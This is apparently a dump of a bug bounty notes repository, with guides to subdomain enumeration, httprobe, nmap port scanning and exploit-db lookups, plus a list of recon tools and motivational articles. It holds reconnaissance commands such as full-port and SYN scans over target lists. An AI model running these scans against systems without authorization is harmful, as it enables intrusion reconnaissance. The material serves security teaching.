b9ba6f298bf44f25845e4e0204c9027d/Untitled 2.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 3.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869/Untitled 1.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/1 Creating our list of subdomains 380c3bc8b56846108ce78f0062bed869/Untitled.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/2 Processing Our List Of Subdomain 6bf06bf770584289a8abd9e63c7bf2bd.md: -------------------------------------------------------------------------------- 1 | # 2. Processing Our List Of Subdomain 2 | 3 | # Intro 4 | 5 | Now that we have a (hopefully big) list of potential subdomains, a big part of the hard work is over. Yaaaay! But we don't have a vulnerability yet so we will have to keep digging deeper into our list of subdomains to find that hidden gem that hopefully others missed. That's why it's so important to have a really solid list of subdomains and why would should do our subdomain enumeration at such a high level. 6 | 7 | We are going to process our list of subdomains with httprobe to see which subdomains are live and which don't even respond at all. We are going to take care to log all subdomains which return an answer. It doesn't matter if we get an error code because error codes also mean that the subdomain is live. 8 | 9 | # HTTProbe 10 | 11 | The description on the github page of HTTProbe is very simple. 12 | 13 | > Take a list of domains and probe for working http and https servers. 14 | 15 | We first need to install HTTProbe 16 | 17 | ```php 18 | go get -u github.com/tomnomnom/httprobe 19 | 20 | We also have to make sure the go/bin folder is added to $PATH variable because that's the location of httprobe 21 | export PATH=$PATH:$HOME/go/bin 22 | ``` 23 | 24 | If we don't have go installed, we need to install that as well ofcourse 25 | 26 | [https://golang.org/doc/install](https://golang.org/doc/install) 27 | 28 | Since i use WSL and ubuntu i execute the following command but it can differ per OS ofcourse 29 | 30 | ```php 31 | sudo apt install golang-go 32 | ``` 33 | 34 | Now we can start checking the massive list we gathered from the previous chapter. 35 | 36 | ```php 37 | cat recon/example/domains.txt | httprobe >> working-domains-google.com.twt 38 | ``` 39 | 40 | This will create a new file with all the domains that returned an answer indicating they are alive. By default this will scan port 80 and port 443 41 | 42 | We can set several flags but I usually use the default settings as they seem to be sufficient. 43 | 44 | # Results 45 | 46 | We should now be left with a file that contains nothing but subdomains that are alive but this still isn't going to lead us to any vulnerabilities. We need this list though to continue to the next step. 47 | 48 | This is where we can choose one of two paths: 49 | 50 | - Further exploration of the alive domains (indicated by the numbers in front of the chapter titles) 51 | - Vulnerability scanning of the alive domains (indicated by the letters in front of the chapter titles) -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a.md: -------------------------------------------------------------------------------- 1 | # 4. Exploiting open ports 2 | 3 | # Introduction 4 | 5 | While we manually explore the results from our subdomain takeover, it's always good to have some automatic scans running, and since i run mine on a VPS (See chapter 98. Using a VPS) I can run some pretty big scans and have them running for a while during my exploration of the targets. For this reason i usually skip to portscanning with nmap and the -sC and -sV flags (more on their meaning later) enabled all of the time. I know that some of us have to hack on a litteral potato though so i will start with the most basic portscans and move on from there. 6 | 7 | # How do we do it? 8 | 9 | To exploit an open port, we first have to know what ports are open and what is running on that port. To do this we have a tool called Nmap, This tool is essential in any pentesters tool belt in my opinion. 10 | 11 | [https://nmap.org/](https://nmap.org/) 12 | 13 | We can take two strategies when it comes to an nmap scan, we can either scan every target individually and have a look at the results or we can try to scan the entire list of subdomains we have found at ones. If you already know nmap a little bit you might be used to working with ip adresses but domains do resolve to an ip adress as well, which in turn we can do a portscan on. 14 | 15 | We will desribe both techniques since nmap can work with a list as well. 16 | 17 | ```jsx 18 | Scanning a list; 19 | nmap -iL list-of-ips.txt -oA scan 20 | Where the -iL stands for input list 21 | And the -oA for output in all formats 22 | 23 | Or a single target; 24 | nmap xx.xx.xx.xx 25 | ``` 26 | 27 | This will scan for the default top 1000 ports but there are 65554 ports possible and that's just in UDP, there's also TCP left so if you want to do a more intense scan that's also possible though i do not recommend doing this on a list of URLs since it can take an extremely long time to complete. 28 | 29 | ```jsx 30 | nmap xx.xx.xx.xx -p- 31 | for all the ports 32 | 33 | nmap xx.xx.xx.xx -sT 34 | for a TCP scan 35 | 36 | nmap xx.xx.xx.xx -sT -p- 37 | for all TCP ports 38 | 39 | nmap xx.xx.xx.xx -sS 40 | For a TCP syn scan 41 | https://www.youtube.com/watch?v=UHvuH07BQ6w for more info 42 | ``` 43 | 44 | The results of this should be a list of subdomains of which we know what ports are open and what not. We can then let nmap automate even more of our work and check for banners for those ports and even execute certain scripts to test for vulnerabilities where possible, though these scripts are ofcourse limited in their capacity. 45 | 46 | ```jsx 47 | nmap xx.xx.xx.xx -p 80,81,22,443 -sC -sV 48 | -p will only scan these ports 49 | -sC Will execute the default scripts on those ports 50 | -sV will grab the banners to show the version numbers 51 | ``` 52 | 53 | If we throw all this together and want to run this on a list of a subdomains and we don't mind how long it runs we can execute the following command. 54 | 55 | ```jsx 56 | nmap -iL list.txt -p- -sC -sV 57 | Scan all the UDP ports with banner grabbing 58 | and default scripts from the list list.txt 59 | ``` 60 | 61 | # The results 62 | 63 | This will leave you with a list of subdomains, their open ports and if the banner grabbing was succesfull, what is running on that port and the version number possibly. This will allow us to do an exciting night of digging the exploit-db to see if those software versions are vulnerable. 64 | 65 | [https://www.exploit-db.com/search](https://www.exploit-db.com/search) 66 | 67 | We can set some pretty deep options with some elaborate settings in the exploit-db's search fields as seen on the screenshot below. 68 | 69 | ![4%20Exploiting%20open%20ports%2028f4a661e49d42748c33b352ad34dc1a/Untitled.png](4%20Exploiting%20open%20ports%2028f4a661e49d42748c33b352ad34dc1a/Untitled.png) 70 | 71 | If exploit-db doesn't offer any consolidation there's always google. I usually enter a very straight forward search query 'exploit jira xx.xx' for example. If i find a trace i might have another trail to investigate in exploit-db. I Keep returning there because i know that every exploit in there has a PoC i can use the prove my impact if need be. Remember that you HAVE to be able to demonstrate impact in a proper PoC! No PoC = No Impact = No Issue = No bounty for you and you don't want to let that hard work go to waste. 72 | 73 | Where we go from here can vary wildly and is outside of the scope of this course. -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/4 Exploiting open ports 28f4a661e49d42748c33b352ad34dc1a/Untitled.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled 1.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled 2.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/98 Running your scripts on a VPS d133b20b46274c8a8d1c7b0d894ba31e/Untitled.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/99 List of tools for grabbing subdomains 788400d9c9d14a79b45c2fb1f6463692.md: -------------------------------------------------------------------------------- 1 | # 99. List of tools for grabbing subdomains 2 | 3 | ## General Tools 4 | 5 | 1. [SubFinder](https://github.com/projectdiscovery/subfinder) 6 | 2. [Findomain](https://github.com/Findomain/Findomain) 7 | 3. [Sublist3r](https://github.com/aboul3la/Sublist3r) 8 | 4. [dnssearch](https://github.com/evilsocket/dnssearch) 9 | 5. [Sudomy](https://github.com/Screetsec/Sudomy) 10 | 6. [Assetfinder](https://github.com/tomnomnom/assetfinder) 11 | 7. [Vita](https://github.com/junnlikestea/vita) 12 | 8. [PureDNS](https://github.com/d3mondev/puredns) 13 | 9. [GetAllUrls(GUA)](https://github.com/lc/gau) 14 | 15 | ## Frameworks 16 | 17 | 1. [Amass](https://github.com/OWASP/Amass) 18 | 2. [Sudomy](https://github.com/Screetsec/Sudomy) 19 | 3. [ReconFTW](https://github.com/six2dez/reconftw) 20 | 4. [DMitry](https://securitytrails.com/blog/dmitry-osint-tool) 21 | 22 | ## Dictionary attacks 23 | 24 | 1. [knockPy](https://github.com/guelfoweb/knock) 25 | 2. [DNSRecon](https://github.com/darkoperator/dnsrecon) 26 | 3. [MassDNS](https://github.com/blechschmidt/massdns) 27 | 28 | ## Datasets 29 | 30 | 1. [crt.sh](https://crt.sh/) 31 | 2. [WaybackURLS](https://github.com/tomnomnom/waybackurls) 32 | 33 | ## Permutation Scanning 34 | 35 | 1. [AltDNS](https://github.com/infosec-au/altdns) 36 | 37 | ## DNS Databases 38 | 39 | 1. [DNS Dumpster](https://dnsdumpster.com/) 40 | 2. [Shodan](https://snippets.shodan.io/c/83ldc9nef1Tp2R8C) 41 | 3. [Pentest-tools](https://pentest-tools.com/information-gathering/find-subdomains-of-domain) 42 | 4. [Rapid7 Forward DNS (FDNS)](https://opendata.rapid7.com/sonar.fdns_v2/) 43 | 5. [Crobat](https://github.com/lnxcrew/crobat) 44 | 6. [Subdomain finder by c99.nl](https://subdomainfinder.c99.nl/) 45 | 7. [BufferOver](http://dns.bufferover.run/dns?q=) 46 | 8. [Spyse](https://spyse.com/) 47 | 48 | ## Checking SubDomain Status Code 49 | 50 | 1. [URLChecker](https://github.com/evanRubinsteinIT/URLChecker) 51 | 2. [HTTProbe](https://github.com/tomnomnom/httprobe) 52 | 53 | ## Bash Extra resources 54 | 55 | ```yaml 56 | curl -s https://rapiddns.io/subdomain/example.com?full=1 | grep -oP '_blank">\K[^<]*' | grep -v http | sort -u 57 | ``` 58 | 59 | 1. curl -s [https://rapiddns.io/subdomain/example.com?full=1](https://rapiddns.io/subdomain/example.com?full=1) >>>> Will download a list of all the domains from rapiddns 60 | 2. grep -oP '_blank">\K[^<]*' >>>> Will grep all the links that open in a new tab 61 | 3. Will grep all URLs that start with http 62 | 4. Will then sort the list 63 | 64 | - [https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/recon-and-osint/subdomain-enumeration](https://gowthams.gitbook.io/bughunter-handbook/list-of-vulnerabilities-bugs/recon-and-osint/subdomain-enumeration) 65 | - [https://github.com/CristinaSolana/subdomain-recon](https://github.com/CristinaSolana/subdomain-recon) 66 | - [https://github.com/ARPSyndicate/kenzer](https://github.com/ARPSyndicate/kenzer) 67 | - [https://github.com/bing0o/SubEnum](https://github.com/bing0o/SubEnum) 68 | - [https://github.com/gwen001/github-search/blob/master/github-subdomains.py](https://github.com/gwen001/github-search/blob/master/github-subdomains.py) -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Nuclei_scanning.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Nuclei_scanning.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Nuclei_template_cheat_sheet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Nuclei_template_cheat_sheet.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/A Vulnerability scanning 713c913200be4fd98948a6d2d6d0f817/Untitled.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/B Vulnerability testing strategy b4124e41647c49c49b11b70e1fb79cff/vulnerability_scanning_(1).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/B Vulnerability testing strategy b4124e41647c49c49b11b70e1fb79cff/vulnerability_scanning_(1).png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 1.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 2.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled 3.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/Untitled.png -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5.md: -------------------------------------------------------------------------------- 1 | # Medium articles 2 | 3 | [How to become a hacker](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/How%20to%20become%20a%20hacker%202cecb0bb861f47e081a40246e1e43b47.md) 4 | 5 | [Are you a competitive hacker?](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/Are%20you%20a%20competitive%20hacker%20383f929eda6c4206a762fa12c189b1b5.md) 6 | 7 | [Docker: A Bug Bounty Hunters Best Friend](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/Docker%20A%20Bug%20Bounty%20Hunters%20Best%20Friend%20df662f7e0f1a4c8290b76f8d640ded4b.md) 8 | 9 | [How to handle failure](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/How%20to%20handle%20failure%20c4edf74994974bb388eecaddc2210199.md) 10 | 11 | [[Bugbountyhunter.com](http://bugbountyhunter.com) membership](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/Bugbountyhunter%20com%20membership%20fbd44fccb0e648f6b04fe523218e7aad.md) 12 | 13 | [Rat's mobile methodology](Medium%20articles%20772065d32a0a4425a2f6343adc86acb5/Rat's%20mobile%20methodology%203adef0ef48cb4a479ac8bf1242be6957.md) -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Are you a competitive hacker 383f929eda6c4206a762fa12c189b1b5.md: -------------------------------------------------------------------------------- 1 | # Are you a competitive hacker? 2 | 3 | # Intro 4 | 5 | A little while ago, i asked you guys via twitter if you are a competitive person. A lot of you guys gave me some amazing answers and i wanted to turn my inspiration into a video for you all to enjoy. 6 | 7 | One of the things i noticed is that everyone has a different view on this topic, though some people have some common points to their view and these are the ones i would like to share with you. 8 | 9 | # The Three types of people 10 | 11 | I have noticed three big lines of thought, of which i will go over each of these and give you my view. 12 | 13 | Some background about me ... i am a very non competitive person. I am more of a cooperation person but i also see where the difficulties lie in that and i realise we do not live in a utopia. My characteristics seem to be shared by many of you and that brings me great joy. It shows me that the world is open to work together and i hope i can provide an environment for you all to grow in in the form of a discord channel in the description below. 14 | 15 | A different kind of person i encountered seemed to be more competitive. The majority of this group seemed to mostly competitive against themselves which really surprised me... but it also did not. I immediately recognised parts of myself in that answer. As a perfectionist, which i think many of you share as a character trait, i am often trying to be better than i was yesterday just like so many of you. We are performing at a TOP level guys, do not forget to be proud of yourself. 16 | 17 | The last type of person I encountered seemed to be more passive. And now the real kicker... i also recognize myself in that. It may seem like a negative trait but if i drill down into the motivations of these people it’s not that they do not actively try to engage. It’s that they engage to help others grow. 18 | 19 | This is an inherent beauty that i hope i can imprint on each and every one of your amazing hackers. I hope that you can learn from one another and that we can all use this as inspiration, as fuel for the fire inside of us to burn bright my friends. You should be competitive. You should be passive and compassionate and you should always strive to be one step ahead of yesterday. This is what keeps us young. 20 | 21 | Thank you all for watching this far. Thank you for everything, i am excited beyond the moon for the fact that i found my home in a community that i have looked up to ever since i was a kid. Today is a good day and tomorrow will be even better. Go and shine bright, you amazing hackers. You are all stars in my humble opinion. -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Bugbountyhunter com membership fbd44fccb0e648f6b04fe523218e7aad.md: -------------------------------------------------------------------------------- 1 | # Bugbountyhunter.com membership 2 | 3 | Hello Amazing hackers 4 | 5 | I Hope you are all doing well today! 6 | 7 | First of all i would like to extend a big thank you to [bugbountyhunter.com](http://bugbountyhunter.com) for making this video possible. I Recently had the chance to try out their premium membership and i am in love. 8 | 9 | Let’s go over some of the features the website has to offer and show you what you can expect for your fee, i promise you will not be disappointed. 10 | 11 | The first thing i want to talk about is Sean’s methodology. He doesn’t just talk about what vulnerabilities to look for but also how he looks for them and what makes a parameter suspicious. Besides all of this he also helps you with the more practical issues of bug bounties such as picking a good target that fits you and report writing. As an expierenced bug bounty hunter, i can personally vouch for his methodology. It looks very similar to mine and besides that, i learned quite a lot from just reading the PDF. 12 | 13 | Now this may seem sweet but I promise you that it’s just the tip of the iceberg. What [bugbountyhunter.com](http://bugbountyhunter.com) offers as well is a web application called Barker. Barker is developed with vulnerabilities built into it that are based on real vulnerabilities from real targets. Again, as a bug bounty hunter i can confirm these issues are very lifelike and look exactly like what i would find when hunting in the wild. On top of the existing vulnerabilities, Barker is updated regularly with cool new vulnerabilities. 14 | 15 | Besides the fact that Barker is amazing, there is also a real reporting system. You can actually report the issues you find and they will be triaged like they would be in a real life scenario. This not only helps you with finding issues but also with improving your reporting which in my opinion is the most important skill a hunter could have because if you can’t prove that there is a vulnerability, you won’t get rewarded or it will take a considerably longer time. 16 | 17 | As if all of this was not enough yet, you also get lifetime access to the bugbountyhunter discord and the possibility to join hacking fridays. Full disclosure though, you need to submit 25 valid bugs and level up to join the hacking fridays but it’s totally worth it and should not take you long at all if you follow the methodology. Hacking Fridays is where the group focusses on a chosen target and exchange idea’s while splitting the bounty. 18 | 19 | To finish up and answer your question whether or not [bugbountyhunter.com](http://bugbountyhunter.com) membership is worth it? YES! For that price you get a full methodology, a simulated target to practice on, a real reporting system and you get to hack with the pro’s... 100% recommended for the money. -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b/05C5F6F5-4262-4DFD-B4BA-8583D3051CDD.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b/05C5F6F5-4262-4DFD-B4BA-8583D3051CDD.png -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b/603D9F12-65F0-4FFC-A2F7-58AF6B4BDEF0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b/603D9F12-65F0-4FFC-A2F7-58AF6B4BDEF0.png -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b/84591517-86DD-4538-84FA-23E99431FB1F.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b/84591517-86DD-4538-84FA-23E99431FB1F.jpeg -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b/D973DC7A-046A-4223-A315-5B1A3AE06058.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/Docker A Bug Bounty Hunters Best Friend df662f7e0f1a4c8290b76f8d640ded4b/D973DC7A-046A-4223-A315-5B1A3AE06058.jpeg -------------------------------------------------------------------------------- /notes/Medium articles 772065d32a0a4425a2f6343adc86acb5/How to handle failure c4edf74994974bb388eecaddc2210199.md: -------------------------------------------------------------------------------- 1 | # How to handle failure 2 | 3 | Hello Amazing person, if you are like me, you probably know the feeling of failure. You probably know what it feels like to be denied your goals and to hate the feeling that follows. 4 | 5 | - To not hack that machine you’ve been trying to hack all week 6 | - To not find any vulnerabilities after hunting for a week 7 | - To not pass that OSCP exam on your first try which you can’t stand 8 | 9 | These feelings are normal and i want to talk to you about how you can handle them. 10 | 11 | First of all, it’s important that you understand it’s okay to feel sad and down and that’s okay to fail. This might seem very obvious, but please don’t underestimate this. Think back to the last exam you failed and how you felt, i bet you it was anything but okay. 12 | 13 | That being said, i am sure you drew a lesson from that instance and i am sure it made you into a better person and i hope you can see that every failure which leads to a failure is not a failure after all ... it’s merely a lesson. 14 | 15 | That, my dear viewer/reader, is the essence of learning. We have to make mistakes in order to understand what we should and should not do because, let’s be honest, it’s not easy to explain every little detail to another person. What we know is known to us but we often can’t explain all the things we feel and touch and experience. Language often falls short for us and that’s why it’s so important that we all make our own mistakes in a safe environment. 16 | 17 | I hope this helps you see that failure is not something we should try to shy away from or actively avoid but that we can make an equally big mistake by not learning anything from mistakes and failures and an even bigger mistake by not allowing ourselves to feel bad about it if that’s what our brain needs. 18 | 19 | There’s a lot to unpack in that previous sentence so let’s start at the beginning. For me it does not matter how often i fall. I realized quickly that falling is a part of life but getting up is an even bigger one. We have to face our mistakes and we have a moral obligation to do what’s right. This means that we will feel bad at times and we will feel disgusted by ourselves even because we haven’t hacked in over a week or we haven’t found any bugs in months. That’s okay, life is a rollercoaster and i believe we should sit back and enjoy the ride. This also means that when our motivation is peaking and we feel on top of the world, that i take full advantage of those good times by preparing for times i feel a bit down. 20 | 21 | Feeling bad is okay, please allow yourself some breathing room. You are performing at the world top. Hacking requires knowledge from so many different fields, it’s a wonder that there are even people like you out there and even if you are not a hacker, the fact that are looking for self improvement is amazing in and of itself and don’t let anyone tell you otherwise. 22 | 23 | I want to devote a part of this piece to your worst enemy in life as well. This may seem a bit cliche but i am a far believer of the fact that we are our own worst enemies in every sense of the word. We can hold ourselves back with merely a thought. If we feel like we are on top of the world, there is almost nothing that can stop us, but one piece of bad news can ruin our streak for a long time. Don’t fight this, go with the flow amazing hacker. It’s like fighting the flow of time. There is nothing in the laws of psychics that stop time from flowing backwards, yet we can never make it do so. Funny don’t you think? 24 | 25 | I want to leave you all a final message. In life, we all walk our own road, but that doesn’t mean we have to get up alone. You have friends in your life and if you do not, i will offer you a place you can call home. This place is full of hackers but i promise you we are good and you have nothing to fear from us. Define your own normal. Uncle Rat Out. -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Screenshot_from_2021-03-11_15-19-23.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Screenshot_from_2021-03-11_15-19-23.jpeg -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Screenshot_from_2021-03-11_15-23-14.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Screenshot_from_2021-03-11_15-23-14.jpeg -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Screenshot_from_2021-03-11_15-29-50.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Screenshot_from_2021-03-11_15-29-50.jpeg -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 1.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 10.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 11.png -------------------------------------------------------------------------------- /notes/Practical Demonstration - Main Web Application hac 731d6dead50b4df9bb12ce143d21bc9a/Untitled 12.png: -------------------------------------------------------------------------------- 